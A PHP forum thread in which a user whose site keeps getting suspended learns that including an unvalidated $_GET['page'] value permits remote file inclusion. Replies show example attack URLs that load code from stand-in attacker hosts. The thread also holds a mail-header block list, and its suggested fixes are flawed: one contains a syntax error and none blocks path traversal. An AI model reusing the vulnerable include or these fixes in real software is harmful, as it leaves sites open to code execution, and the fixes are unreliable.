Jump to content

[Resolved] Is this an exploit?


Pixelsize

Recommended Posts

Hi there, I think this is the place where to post this question.

At the webhosting I'm at, they keep suspending my webpage because my code is vulnerable to attacks. This is the code:

[code]<?

// Security patch against spam exploit

// Provided by TangoWebs

$badStrings = array("Content-Type:", "MIME-Version:", "Content-Transfer-Encoding:", "bcc:", "cc:");

foreach($_POST as $k => $v){

foreach($badStrings as $v2){

if(strpos($v, $v2) !== false){

header("HTTP/1.0 403 Forbidden");

exit;

}

}

}

?>

<title>Heh I didn't wanna show the site's title xD sry xD</title>

<link href="style.css" rel="stylesheet" type="text/css">

<?php

// Variables

$page=$_GET['page']; // Gets info



// Display

include "header.html"; // Shows Header



if ($page=="") {

$page="home";

}

$page=$page . ".html";

include $page;



include "footer.html";

?>[/code]

TangoWebs is the name of the webhosting company... they provided this code and asked me to put it, and they say hackers are still sending e-mails, mail bombing, or whatever... from my website. This is just one page, but they are all exactly same, just change on what directory to include. Thanks for your time, I hope anyone could see what I still can't. Cya!!  :D
Link to comment
Share on other sites

would need to see the code for generating the e-malis, how the user submits the content for the e-mail and any associated login stuff (like if the user must be logged in and a session is created.).

The only thing I could suggest in this little lot is this.

record the ip address the request originated from and store this in the database along with the time of the request.  Each time the script runs it should check the ip address against the database and if there is not sufficient time between the last e-mail and now - deny the request.

I think a 10 minutes interval would be sufficient.....
Link to comment
Share on other sites

No login, no forms... this is all... They say they won't reactivate my account until I can ensure that the code has no security wholes :S So I can't do tests... But do you think anyone could just send e-mails by taking advantage of... what? a $_GET???
Link to comment
Share on other sites

well in that case the only vunerability is the include $page bit.

Say soneone had a page they had written to send out mass e-mails and it was located here:

http://www.dodgeysite.com/email.php

they could use your page to exploit that by simply setting page=http://www.dodgeysite.com/email.php in the url.

On my sites i always use a control on includes that are driven by the users input.

my includes always look like

include($_SERVER['DOCUMENT_ROOT'] . $page);

that way the file being included MUST reside on your domain.
Link to comment
Share on other sites

This code here is very vunerable!
[code]if ($page=="") {

$page="home";

}

$page=$page . ".html";

include $page;[/code]
A malicous attacker can put something like this:
yoursite.com?page=http://attackersite.com/badfile.html
Now within that badfile the attackers made there could be PHP code with would not only affect your account, but everyone elses account on the hosts server, such cause hacvock with the database

So whats the way around this. To validate the user input. Before you include make sure:
- the page variable doesnt hold urls - preg_match can help you there
- make sure the file you are going to be including is actually exists on your site - file_exists can help here to

With file_exists dont do this:
if(file_exists($_GET['page']))

append your sites document roort to it like so:
if(file_exists($_SERVER[['DOCUMENT_ROOT'] . $_GET['page']))

Never use raw _GET or POST'd data! Always validate and verify user input.
Link to comment
Share on other sites

[quote author=wildteen88 link=topic=99803.msg393230#msg393230 date=1152296362]
append your sites document root to it like so:
if(file_exists($_SERVER[['DOCUMENT_ROOT'] . $_GET['page']))
[/quote]
That's a really useful - thankyou :)
Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.